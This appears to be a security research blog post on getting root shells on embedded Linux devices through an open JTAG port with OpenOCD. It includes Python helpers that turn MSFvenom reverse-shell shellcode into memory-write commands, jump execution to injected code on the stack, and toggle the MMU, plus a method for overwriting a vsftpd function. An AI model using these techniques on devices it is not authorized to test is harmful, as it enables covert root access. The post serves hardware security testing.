Thursday, January 7, 2021

TAPing the Stack for Fun and Profit: Shelling Embedded Linux Devices via JTAG

By Ethan Shackelford

While it may not come as a surprise to those who have worked with embedded devices, it is not uncommon to find the JTAG interface on embedded devices still enabled, even in production. Often cited as providing “ultimate control” over a device, JTAG debugging usually provides the user with full read/write privileges over device memory (and by extension over MMIO) as well as the ability to read and write control registers. 

On a simpler embedded device (for example, a "smart" lock), leveraging open JTAG can be fairly straightforward: dump the bare metal firmware via JTAG, reverse engineer it to determine the details of its operation (such as the function which performs validation on the entered PIN code), and either use the JTAG interface to re-write the firmware in flash, or flip some bits in memory (in this example, to trick the PIN code check logic into accepting an invalid PIN code). 

However, embedded Linux platforms can complicate this process substantially. First, the firmware is not bare-metal, but instead a complex system including a multi-stage bootloader, the Linux kernel image, and various filesystems. Second, storage devices are more likely to be managed and mounted by the kernel, rather than memory-mapped, making access to peripherals over JTAG substantially more complicated than on bare-metal systems. Third, MCUs used for embedded Linux tend to have a more robust MMU and memory management scheme, which creates two hurdles of its own. The MMU restricts memory access depending on the execution context, which means that it must either be disabled entirely or configured to suit the task at hand. And once the MMU is disabled, the virtual addresses seen during ordinary JTAG memory access have to be correlated to locations in physical memory, which is not always straightforward.

Thus, while open JTAG does usually grant ultimate control over a device, the operations performed are sufficiently low-level as to make actually manipulating a Linux system in this way a difficult and somewhat arcane task. However, operating in a Linux environment does have its perks. On bare-metal systems, device operation must be manipulated directly over JTAG in a way specific to the particular device being tested. Leveraging JTAG on a Linux-based device, by contrast, typically revolves around a uniform goal: access to a root shell. This uniformity means that a similar group of techniques can be used to gain access in any case where a Linux-based device has an enabled JTAG interface.

Despite the obvious and widespread nature of this issue, there appears to be little to no existing work published on this topic. To help fill this void, this article is intended to detail the process of using access to a JTAG interface to move to a root shell on a Linux-based device, as well as the common issues and pitfalls which may be encountered therein.

 

Interacting with the TAP controller


While this document will not go into great detail on the inner workings of JTAG and the associated tooling, the following is a short crash course on using OpenOCD and a JTAG hardware adapter to interact with a device’s TAP controller.

Interacting with a device via JTAG requires some means of driving each of its pins. This can be accomplished with specialized hardware, such as the SEGGER J-Link series of adapters (which I will use for the purposes of this article), or just as easily with a more generic device like a Bus Blaster or FTDI dongle, such as an FT2232. The experience with a given adapter will vary depending on how well it is supported by OpenOCD; the Bus Blaster and SEGGER J-Link are both well supported.

 Determining JTAG pinout on a given board is outside of the scope of this document, but a wealth of information for doing so exists online. Once the pinout has been determined, the device under test and the chosen JTAG adapter should be connected appropriately. Pictured below is the example device and a J-Link adapter, connected based on the determined pinout of the board’s JTAG header.

 

After connecting to the device, OpenOCD can be used to interact with the TAP controller. In order to do so, OpenOCD requires information on the CPU to which you're connected and the adapter used for the connection. It supports many adapter/target combinations out of the box, and on a standard installation the appropriate configuration files can be found in the target, board, and interface subdirectories of /usr/local/share/openocd/scripts.

In this example, we're working with an NXP i.MX28 CPU and the SEGGER J-Link, so the call to OpenOCD looks like the following:
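A minimal sketch of that invocation, written as a small Python helper so the argument list is explicit. The config file names `interface/jlink.cfg` and `target/imx28.cfg` are assumed to be the stock files shipped with OpenOCD and should be confirmed against the local scripts directory; the helper name `openocd_argv` is hypothetical.

```python
import shlex


def openocd_argv(interface_cfg, target_cfg, extra_scripts=()):
    """Build an OpenOCD command line: one -f flag per config or script file."""
    argv = ["openocd", "-f", interface_cfg, "-f", target_cfg]
    for script in extra_scripts:
        argv += ["-f", script]
    return argv


# Assumed stock config names; check that they exist in your installation.
argv = openocd_argv("interface/jlink.cfg", "target/imx28.cfg")
print(shlex.join(argv))
```

The printed string can be pasted into a terminal, or the list can be handed to `subprocess.Popen` when OpenOCD needs to be started from a script.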

 

To verify a valid connection, confirm that the reported IDCODE (here 0x079264f3) matches the expected value for the targeted processor; this information can be found in the datasheet for the processor. 
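When comparing against the datasheet, it can help to split the IDCODE into its fields. The sketch below follows the standard IEEE 1149.1 layout (4-bit version, 16-bit part number, 11-bit manufacturer ID, and a fixed low bit of 1); the function name `decode_idcode` is hypothetical.

```python
def decode_idcode(idcode):
    """Split a 32-bit JTAG IDCODE into its IEEE 1149.1 fields."""
    return {
        "version": (idcode >> 28) & 0xF,
        "part_number": (idcode >> 12) & 0xFFFF,
        "manufacturer": (idcode >> 1) & 0x7FF,
        "marker_bit": idcode & 0x1,  # always 1 for a valid IDCODE
    }


fields = decode_idcode(0x079264F3)
print({name: hex(value) for name, value in fields.items()})
```

For the IDCODE reported here, the part number field comes out as 0x7926. A value of all zeros or all ones, or a low bit of 0, usually points to a wiring or clocking problem rather than a real device.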

For simple, manual interaction, OpenOCD exposes a telnet listener on port 4444. OpenOCD can also be loaded with TCL script files at launch, by passing additional “-f” flags pointing to the desired scripts. 

Now that we can talk to the TAP controller, we can move on to the various techniques for leveraging the JTAG interface.

 

Techniques


Depending on the processor, the actual implementation of various functions available over JTAG may differ. In general, the same set of primitives will be available: read/write to flash and other memory mapped IO, read/write to various CPU-specific control registers, and read/write to RAM. If you're familiar with more traditional exploitation techniques, these probably sound a lot like read-where/write-where memory-corruption-based exploitation primitives; this is a useful way of thinking of them. 

There are a few constraints to keep in mind while attempting to gain code execution on a Linux device over JTAG:
  • While the JTAG interface has full control of the processor, this doesn’t mean that extra steps won’t be required to make use of it. For example, the debug interface can write to any area of RAM, but it will be doing so in the same context as whatever program was running when the CPU was halted. In the context of a Linux system, this means the same rules that apply to programs apply to any memory access by the debug interface: access an area of memory outside the virtual memory space of the currently executing process, and the MMU will reject the memory access and generate a DATA ABORT exception. 
  • Not all execution contexts are created equal. Anyone taking their first steps toward exploiting Linux kernel modules will know that code executed from the context of the kernel (or “Supervisor” from the perspective of the CPU) is generally incompatible with code and exploitation techniques written for userland. While it is possible to tailor shellcode to either context, the context should be kept in mind when setting things up. 
  • As we will see shortly, making our way to a shell from these primitives involves overwriting some section of memory. Of course, if the code or data we overwrite with shellcode is critical to system operation in some way, the system will no longer function as expected, so take care in selecting an area of memory that can be overwritten without interfering with the system as a whole.
For these examples, the following conditions were chosen for exploitation: 
  • We will be exploiting the JTAG access from userspace, rather than from kernel code. There is no real reason for this, other than the fact that it's a bit simpler than acting from kernelspace, and it so happens that any shell on the device under test will be a root shell, so we don’t gain any additional privileges by going the kernelspace route.
  • The device under test provides an Ethernet interface for communication with the outside world. This will be our target for gaining a shell by opening a reverse shell over an unused TCP port. If the device did not have this interface and instead had, say, a UART console, the timing, memory areas, and shellcode chosen would differ somewhat. However, the overall procedure in this article would still apply.
The first step is simply to generate some valid shellcode to load into memory. To generate shellcode for performing our chosen operation, a reverse TCP shell, we use MSFvenom, specifying the target architecture/platform (armv5le, linux). We want the raw byte output, as we’ll be injecting it directly into memory.

 

As illustrated above, the size of the shellcode in this case is 172 bytes. Not huge, but it could certainly pose a problem depending on how the MMU is configured. In fact, in the case of our example device, this tends to exceed the MMU-allowed writable length of memory under $pc, and we will need to address it as we perform some of the techniques outlined below.
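Since the payload is a raw byte string, it has to be converted into something the debugger can write. One option, sketched below, is to pack it into 32-bit little-endian words (matching the armv5le target) and emit one OpenOCD `mww` command per word. The helper names are hypothetical, the zero padding is a choice made for this sketch, and the placeholder bytes stand in for real shellcode.

```python
import struct


def shellcode_to_words(shellcode):
    """Pad raw shellcode to a 4-byte multiple and unpack it as little-endian words."""
    padded = shellcode + b"\x00" * (-len(shellcode) % 4)
    return list(struct.unpack("<%dI" % (len(padded) // 4), padded))


def mww_commands(base_addr, shellcode, phys=False):
    """Emit one OpenOCD `mww` (memory write word) command per 32-bit word."""
    prefix = "mww phys" if phys else "mww"
    return [
        "%s 0x%08x 0x%08x" % (prefix, base_addr + 4 * i, word)
        for i, word in enumerate(shellcode_to_words(shellcode))
    ]


# Placeholder bytes of the same length as the payload described in the text.
placeholder = bytes(range(172))
print(len(shellcode_to_words(placeholder)))  # 172 bytes -> 43 words
print(mww_commands(0x40001000, placeholder, phys=True)[0])
```

The base address here is illustrative only. Knowing the word count up front (43 in this case) makes it easier to judge whether the payload fits inside the writable region being targeted.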

Smashing with Precision


Although the famous Phrack article is nearly a quarter-century old at the time of writing, the old-school stack smashing of days gone by is alive and well in the embedded world. It is not entirely uncommon, depending on the architecture family/version and degree of programmer negligence, to find devices in the embedded world which either do not have a “no execute” flag for memory access, or have the flag disabled if it is available. If this is the case, gaining a shell is very straightforward: halt the CPU, overwrite the stack with shellcode, and jump to $sp. In most cases, the stack will have enough space allocated to avoid generating a segmentation fault on write, and is always writable by nature, enabling us to sidestep any MMU shenanigans that might be required for other techniques during exploitation. 
 
This technique requires little to no knowledge of the software running on the device, and generally will not crash or permanently alter the operation of the device. It still might crash, if you get unlucky with the function whose stack is being overwritten, and so isn’t suitable for testing environments where any degree of device malfunction is unacceptable.
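The halt, overwrite, and jump sequence can be sketched as a short list of OpenOCD commands. This is an illustration under assumptions rather than the exact session used here: the stack pointer is passed in as a number because it must first be read from the halted core (the register's name in OpenOCD varies by core), and `shellcode.bin` is a hypothetical file name for the raw payload.

```python
def stack_smash_commands(sp, shellcode_path):
    """Return OpenOCD commands that write shellcode at $sp and resume there."""
    return [
        "halt",                                              # stop the core
        "load_image %s 0x%08x bin" % (shellcode_path, sp),   # raw bytes at $sp
        "resume 0x%08x" % sp,                                # continue from $sp
    ]


# Illustrative stack pointer value only; read the real one from the target.
for command in stack_smash_commands(0xBEFFF000, "shellcode.bin"):
    print(command)
```

The commands can be typed into the telnet session one at a time, which leaves room to inspect registers between steps and back out if the halted context looks unsuitable.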

 

A number of factors may exclude this technique as a possibility, such as a no-execute bit or stack constraints. It may be possible to work around these factors via the JTAG interface, but in the case that a workaround fails, other techniques are available.

 

Firing From the Hip


In general, device exploitation can be aided by access to a copy of the firmware. If firmware is not available, it's possible to feel your way around the system semi-blind, halting and inspecting configuration registers to determine when you’ve landed in a suitable place. This technique will also routinely crash the device, unless you get incredibly lucky on your first attempt, so this is not a technique suited to an environment where a crashed device is not a recoverable scenario.

The MMU will need to be addressed to allow manipulation of memory, so that shellcode can be written and execution resumed without generating a fault. To do so, we can either reconfigure the MMU to allow reads/writes to the areas to which we want to write, or just disable the MMU entirely. The former option is more complicated to set up, but the latter requires extra work since without the MMU we’ll need to translate virtual addresses to physical addresses ourselves. However, disabling the MMU is also a more universal option, easily applied to a variety of CPUs and architectures.

Here we opt for disabling the MMU, writing shellcode under the memory pointed to by the program counter, then re-enabling the MMU to allow execution to continue without error. There are a few techniques for correlating MMU-enabled (virtual) addresses with the MMU-disabled (physical) addresses; in this case, we dump the full system RAM via JTAG with the MMU disabled, then use a simple homemade tool to match the bytes under the program counter to an offset into the RAM dump. 

  
This tool can be used with the output of OpenOCD’s dump_image command to find where, in the physical address space, a given virtual address is pointing. While the dumped RAM image may not be identical between boots, the locations of loaded binaries in memory will generally stay the same, because the device will tend to run the same programs in the same order every time.
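The original tool is not reproduced here, but the idea is a plain byte search. A minimal sketch, assuming the RAM dump and the sample from under the program counter are both available as byte strings; the function name and the RAM base address used in the demonstration are illustrative.

```python
def find_physical_addresses(ram_dump, needle, ram_base=0):
    """Return every physical address where `needle` occurs in `ram_dump`."""
    hits = []
    offset = ram_dump.find(needle)
    while offset != -1:
        hits.append(ram_base + offset)
        offset = ram_dump.find(needle, offset + 1)
    return hits


# Synthetic stand-ins for a RAM dump and the bytes dumped from under $pc.
needle = bytes(range(1, 17))
ram_dump = bytes(4096) + needle + bytes(4096)
print([hex(addr) for addr in find_physical_addresses(ram_dump, needle, ram_base=0x40000000)])
```

Returning every match rather than only the first makes ambiguity visible: more than one hit means the sample is too short or too generic to trust. A sample that crosses a page boundary may also fail to match, since pages that are adjacent in virtual memory need not be adjacent in physical memory; a shorter sample can help in that case.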

   

 The image above illustrates the process of using OpenOCD in conjunction with the tool:
  1. The CPU is halted here, and found to be in the “User” execution context. If it had been halted under any other context, most likely “Supervisor,” the CPU would be resumed, and the process repeated, until the CPU is halted in the correct execution context. 1024 bytes starting at the program counter are then dumped to a file.
  2. That resulting file is fed into the tool, and found within the dumped RAM image. The tool outputs the address at which a matching sequence of 1024 bytes is found (the physical address).
  3. The MMU is disabled here, and the shellcode is written to the physical address to which the virtual address in the program counter is mapped. The process of disabling the MMU is CPU-specific; information on how to do so can be found in the appropriate reference manual. Here it is accomplished by clearing a specific bit in a specific control register.
  4. The MMU is re-enabled and the memory under the program counter is read to confirm the shellcode has been written. The bytes read match the bytes of the shellcode, confirming we have written to the correct physical address.
  5. The CPU is resumed, with execution continuing from the program counter, our shellcode now occupying the memory to which it points. The netcat listener receives a connection, and a bash shell is available to the attacker. In this case, the shell runs with root privileges.
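Steps 3 and 4 hinge on toggling a single bit. As a hedged illustration: on ARMv5 cores such as the ARM926EJ-S in the i.MX28, the MMU enable is bit 0 (M) of the CP15 c1 control register, and the sketch below assumes that is the register involved. The `arm mcr` command strings follow the form given in the OpenOCD manual and should be checked against the installed version; the register value is an illustrative one, not a reading from this device.

```python
MMU_ENABLE_BIT = 0x1  # bit 0 ("M") of the ARM CP15 c1 control register


def mmu_toggle_commands(control_reg):
    """Given the current control register value, return (disable, enable) commands."""
    disabled = control_reg & ~MMU_ENABLE_BIT & 0xFFFFFFFF
    enabled = control_reg | MMU_ENABLE_BIT
    return (
        "arm mcr 15 0 1 0 0 0x%08x" % disabled,  # write back with M cleared
        "arm mcr 15 0 1 0 0 0x%08x" % enabled,   # write back with M set
    )


# The current value would first be read with `arm mrc 15 0 1 0 0`.
disable_cmd, enable_cmd = mmu_toggle_commands(0x00053177)
print(disable_cmd)
print(enable_cmd)
```

Preserving every other bit of the register matters, since the same register also controls the caches and other behavior that the running system depends on.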
So, easy right? Not exactly. 

The far more likely outcome of the above process is that the userspace code we randomly halted on turns out to be one of two things. It may be a crucial library function (think overwriting malloc with shellcode), in which case the shellcode crashes at some subsequent step, no shell is gained, and most other device functionality probably breaks as well. Or it may be some piece of code whose absence prevents successful shell access. In practice, actually getting through this process with a shell at the end required around 20-30 attempts on average, with many failed attempts requiring a device reset to un-break critical library code. 

This is fine, if tedious, under circumstances where a device can be reset and taken down arbitrarily. However, in contexts where a device cannot be taken offline or reset, this approach is obviously not viable.

 

Know Thine Enemy


In cases where device firmware is available, or where the exact versions of libraries or other software in use by the system are known or possessed, we can take a more targeted approach. The ability to identify the location in physical memory of a binary or library known to be called during device operation enables us to overwrite a function from within that binary or library with shellcode. Upon execution of that particular function as part of the normal operation of the device, the shellcode will run in place of the function normally at that offset into the binary. When we can choose a function to overwrite whose absence will not cause any unacceptable side effects for the device, we can avoid device crashes or other interruptions.

In the case of the example device, the firmware is available, and we can use one of a variety of binary analysis tools to determine an appropriate function to overwrite. IDA, Binary Ninja, radare, and even the humble objdump are just fine for this purpose. For this example we'll use Binary Ninja. 

In looking for an appropriate function, we should seek the following conditions:
  • The binary or library should be loaded at startup, and continue running during device operation. This ensures that it will be present in RAM when memory is dumped, and that its position in RAM will be the same between boots. This rules out something like a cgi-bin called in response to an HTTP request, which would otherwise be a good candidate.
  • The function should either have some external attacker-accessible trigger, or should be a function that repeats reliably. If the function only runs once, during system boot, the shellcode will never actually execute if it's loaded after the function has been executed.
  • The function should not be system-critical, especially in the case of standard libraries. It's fairly trivial to track down an appropriate version of libc or libpthread, for example, and simply overwrite something like pthread_mutex_unlock, with a pretty strong guarantee that the function will run at some point, triggering the shellcode. However, the next time a function needs to unlock a mutex, the system will come crashing down, requiring a reset.
  • While not required, it can be useful to choose some binary or library whose source code is publicly available, as the code can come in handy to work out the most appropriate function to overwrite and save some time otherwise spent reverse engineering.
After some digging around, we identified a good candidate for shellcode injection in a vsftpd server running on the device. Exclusively used for OTA firmware updates, a lapse in functionality in this server will not interfere with the operation of the device. In a real-world scenario where the ability to initiate an OTA update would eventually be required again, after acquiring root shell access the vsftpd server can be restarted and reloaded into memory uncorrupted by shellcode.

   

Some minimal reverse engineering and cross-referencing against the vsftpd source turns up a function, vsf_sysutil_retval_is_error, which looks like a good choice. It appears to be vsftpd's error checking function, meaning it will likely be called during most operations. This is supported by a fairly large number of cross references in a wide range of functions. One drawback is that the function itself is only eight bytes long, and overwriting it will clobber the function positioned under it in memory. This means that the vsftpd server is toast after our exploit is fired, but as mentioned before, we can simply restart the vsftpd server from our root shell if desired. 
 
Using the same tool as in the previous techniques, we find the physical address in RAM of the function we'd like to overwrite. This time, rather than searching for the bytes dumped from under $pc, we look for 0x100 bytes or so from the vsftpd binary, starting at the beginning of the target function. This can be done with dd, or just by copying-and-pasting if you're using Binary Ninja or similarly equipped software.
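A rough Python equivalent of that dd-and-search step, assuming the file offset of the target function within the vsftpd binary has already been worked out in the disassembler. The function names and the synthetic data are hypothetical.

```python
def function_signature(binary, file_offset, length=0x100):
    """Slice `length` bytes from the on-disk binary, starting at the target function."""
    signature = binary[file_offset:file_offset + length]
    if len(signature) < length:
        raise ValueError("binary too short for requested signature")
    return signature


def locate_in_ram(ram_dump, signature, ram_base=0):
    """Return the physical address of the signature, or None if absent or ambiguous."""
    first = ram_dump.find(signature)
    if first == -1 or ram_dump.find(signature, first + 1) != -1:
        return None
    return ram_base + first


# Synthetic stand-ins for the vsftpd binary and the RAM dump.
binary = bytes(0x400) + bytes(range(256)) + bytes(0x400)
ram_dump = bytes(0x2000) + binary[0x400:]
address = locate_in_ram(ram_dump, function_signature(binary, 0x400), ram_base=0x40000000)
print(hex(address))
```

Treating a repeated match as a failure is deliberate: writing shellcode to the wrong copy of a byte sequence is worse than having to pick a longer signature and search again.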

   

Moving back to the JTAG connection, we can now write to the acquired physical address (shown in the preceding image), overwriting the target function with shellcode. To trigger its execution, we'll use an FTP client to connect to the target device, which at some point calls the vsf_sysutil_retval_is_error function as expected. 

 

Further Reading

  • JTAG Explained (finally!) - A fantastic introduction to JTAG from a security perspective, including some information on performing a similar attack on a device with an exposed UART console.
  • JTAGTest.com Pinout Reference - A collection of various standard JTAG header pinouts, useful for identifying mystery pinouts on boards under test.
  • Smashing The Stack For Fun And Profit - A must-read for the aspiring hardware hacker; many of the points discussed within apply equally when working with a device over a JTAG connection.

References